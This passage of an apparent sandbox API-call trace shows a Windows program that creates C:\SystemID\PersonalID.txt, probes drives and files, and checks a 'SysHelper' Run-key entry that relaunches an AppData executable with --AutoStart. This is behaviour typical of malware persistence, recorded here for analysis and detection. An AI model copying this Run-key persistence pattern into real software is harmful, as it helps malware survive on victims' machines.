(lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0126.290] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18dbb0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a8 [0126.290] GetFileType (hFile=0x5a8) returned 0x1 [0126.290] GetLastError () returned 0x0 [0126.300] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.303] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0126.303] RegisterClassExW (param_1=0x18de28) returned 0xc16a [0126.303] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x70114 [0126.303] NtdllDefWindowProc_W () returned 0x0 [0126.303] NtdllDefWindowProc_W () returned 0x1 [0126.305] NtdllDefWindowProc_W () returned 0x0 [0126.564] NtdllDefWindowProc_W () returned 0x0 [0126.564] ShowWindow (hWnd=0x70114, nCmdShow=0) returned 0 [0126.564] UpdateWindow (hWnd=0x70114) returned 1 [0126.564] GetLogicalDrives () returned 0x4 [0126.564] SetErrorMode (uMode=0x1) returned 0x0 [0126.565] PathFileExistsA (pszPath="C:\\") returned 1 [0126.565] SetErrorMode (uMode=0x0) returned 0x1 [0126.565] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0126.565] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x806) returned 0x62da4b8 [0126.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dde0, cbMultiByte=-1, lpWideCharStr=0x62da4b8, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0126.565] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x810) returned 0x62dacc8 [0126.565] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62da4b8 | out: hHeap=0x31d0000) returned 1 [0126.565] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x18) returned 0x5e07d50 [0126.565] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62dacc8 | out: hHeap=0x31d0000) returned 1 [0126.565] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e07d50 | out: hHeap=0x31d0000) returned 1 [0126.565] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x18) returned 0x5e07d50 [0126.565] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x10) returned 0x62b4680 [0126.565] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x8ec) returned 0x62da4b8 [0126.565] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x810) returned 0x62dadb0 [0126.565] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x62fc1a8 [0126.565] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x1060) returned 0x62d5b98 [0126.565] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x60) returned 0x32c0068 [0126.565] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x810) returned 0x62db5c8 [0126.565] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x660) returned 0x62d4090 [0126.565] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x62fca30 [0126.565] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x62fd2b8 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x62fdb40 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x62fe3c8 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x62fec50 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x840) returned 0x62d6c00 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x62ff4d8 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x62ffd60 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x840) returned 0x62d7448 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x860) returned 0x63073c8 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x860) returned 0x6307c30 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x63005e8 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6300e70 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x840) returned 0x6308498 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x840) returned 0x6308ce0 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x63016f8 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6301f80 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6302808 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6303090 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6303918 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6309540 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6309dc8 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x630a650 [0126.566] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x630aed8 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x630b760 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x860) returned 0x6319528 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x860) returned 0x6319d90 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x630bfe8 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x630c870 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x630d0f8 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x840) returned 0x631a5f8 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x840) returned 0x631ae40 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x630d980 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x630e208 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x630ea90 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x630f318 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x630fba0 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6310428 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6310cb0 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6311538 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6311dc0 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x860) returned 0x631b688 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x860) returned 0x631bef0 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6312648 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6312ed0 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6313758 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x840) returned 0x631c758 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x840) returned 0x6313fe0 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6314868 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x63150f0 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6315978 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6316200 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6316a88 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6317310 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6317b98 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6318420 [0126.567] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x631cfb8 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x860) returned 0x632cfa0 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x860) returned 0x632d808 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x631d840 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x631e0c8 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x631e950 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x840) returned 0x631f1d8 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x631fa60 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x63202e8 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6320b70 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x63213f8 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6321c80 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc0) returned 0x5e1cff8 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6322508 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x810) returned 0x632e070 [0126.568] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x810) returned 0x5ea5fe8 [0126.569] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x810) returned 0x5ea6800 [0126.569] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x810) returned 0x5ea7018 [0126.569] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x810) returned 0x5ea7830 [0126.569] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x810) returned 0x5ea8048 [0126.569] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x810) returned 0x5ea8860 [0126.570] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x60) returned 0x32c0138 [0126.570] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6322d90 [0126.570] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6323618 [0126.570] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6323ea0 [0126.570] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x820) returned 0x6324728 [0126.570] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x110) returned 0x5dda6f8 [0126.570] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x62da4c0, dwCreationFlags=0x0, lpThreadId=0x62b4688 | out: lpThreadId=0x62b4688*=0xb0) returned 0x344 [0126.570] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0x5e4) returned 0x340 [0126.571] GetMessageW (in: lpMsg=0x18dfd8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18dfd8) returned 1 [0133.590] NtdllDefWindowProc_W () returned 0x0 [0133.591] NtdllDefWindowProc_W () returned 0x0 [0133.716] NtdllDefWindowProc_W () returned 0x0 [0133.717] NtdllDefWindowProc_W () returned 0x0 [0133.717] NtdllDefWindowProc_W () returned 0x0 [0133.718] NtdllDefWindowProc_W () returned 0x0 [0133.718] NtdllDefWindowProc_W () returned 0x0 [0133.718] NtdllDefWindowProc_W () returned 0x1 [0133.720] NtdllDefWindowProc_W () returned 0x0 [0133.738] NtdllDefWindowProc_W () returned 0x0 [0133.739] NtdllDefWindowProc_W () returned 0x0 [0133.739] NtdllDefWindowProc_W () returned 0x0 [0133.740] NtdllDefWindowProc_W () returned 0x3 [0133.740] TranslateMessage (lpMsg=0x18dfd8) returned 0 [0133.740] DispatchMessageW (lpMsg=0x18dfd8) returned 0x0 [0133.740] GetMessageW (in: lpMsg=0x18dfd8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18dfd8) returned 0 [0133.740] NtdllDefWindowProc_W () returned 0x2 [0133.741] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18c6f0 | out: phkResult=0x18c6f0*=0x6b8) returned 0x0 [0133.741] RegQueryValueExW (in: hKey=0x6b8, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18c6ec, lpData=0x18ae18, lpcbData=0x18c6d0*=0x400 | out: lpType=0x18c6ec*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe\" --AutoStart", lpcbData=0x18c6d0*=0xd0) returned 0x0 [0133.741] RegCloseKey (hKey=0x6b8) returned 0x0 [0133.741] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xd0) returned 0x5eaa098 [0133.741] lstrlenA (lpString="\" --AutoStart") returned 13 [0133.741] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc0) returned 0x5e1d318 [0133.741] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5eaa098 | out: hHeap=0x31d0000) returned 1 [0133.741] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe") returned 1 [0133.742] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e1d318 | out: hHeap=0x31d0000) returned 1 [0133.742] IsWindow (hWnd=0x70114) returned 1 [0133.742] DestroyWindow (hWnd=0x70114) returned 1 [0133.742] NtdllDefWindowProc_W () returned 0x0 [0133.742] NtdllDefWindowProc_W () returned 0x1 [0133.744] NtdllDefWindowProc_W () returned 0x0 [0133.744] NtdllDefWindowProc_W () returned 0x0 [0133.744] NtdllDefWindowProc_W () returned 0x0 [0133.744] NtdllDefWindowProc_W () returned 0x0 [0133.744] NtdllDefWindowProc_W () returned 0x0 [0133.744] PostQuitMessage (nExitCode=0) [0133.751] NtdllDefWindowProc_W () returned 0x0 [0133.751] CloseHandle (hObject=0x59c) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e07d50 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea3cd0 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea3a78 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea3e10 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea3f00 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea3f28 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea3f50 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f560 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f2f8 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea3f78 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea3fa0 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea3fc8 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea3ff0 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4018 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4040 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4068 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f330 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f1e0 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4090 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea40b8 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea40e0 | out: hHeap=0x31d0000) returned 1 [0133.751] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4108 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4130 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4158 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4180 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea41a8 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f448 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f598 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea41d0 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea41f8 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4220 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4248 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4270 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4298 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea42c0 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea42e8 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f5d0 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f608 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4310 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4338 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4360 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea4388 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea43b0 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c1760 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c3238 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c2c10 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e1cf30 | out: hHeap=0x31d0000) returned 1 [0133.752] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x3221480 | out: hHeap=0x31d0000) returned 1 [0133.753] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f4f0 | out: hHeap=0x31d0000) returned 1 [0133.753] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x63591f0 | out: hHeap=0x31d0000) returned 1 [0133.753] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6358f68 | out: hHeap=0x31d0000) returned 1 [0133.753] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6358c50 | out: hHeap=0x31d0000) returned 1 [0133.753] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6358c08 | out: hHeap=0x31d0000) returned 1 [0133.753] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e35388 | out: hHeap=0x31d0000) returned 1 [0133.753] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32189a8 | out: hHeap=0x31d0000) returned 1 [0133.753] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b4680 | out: hHeap=0x31d0000) returned 1 [0133.753] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x31ee758 | out: hHeap=0x31d0000) returned 1 [0133.754] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5dfe3b8 | out: hHeap=0x31d0000) returned 1 [0133.754] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f9f88 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62fa810 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62fb098 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62fb920 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32c00d0 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f9700 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c5b60 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62ede00 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6304a20 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d9ca0 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d9488 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d8c70 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d8458 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5db0920 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62dc530 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62dd590 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62dddc8 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62de600 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62dee38 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62dfeb0 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62df670 | out: hHeap=0x31d0000) returned 1 [0133.761] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62dcd58 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e0f40 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e2830 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e34b0 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e06f8 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e1788 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e4130 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e4978 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e51c0 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e59f8 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e6230 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e1fb0 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e6a68 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e7290 | out: hHeap=0x31d0000) 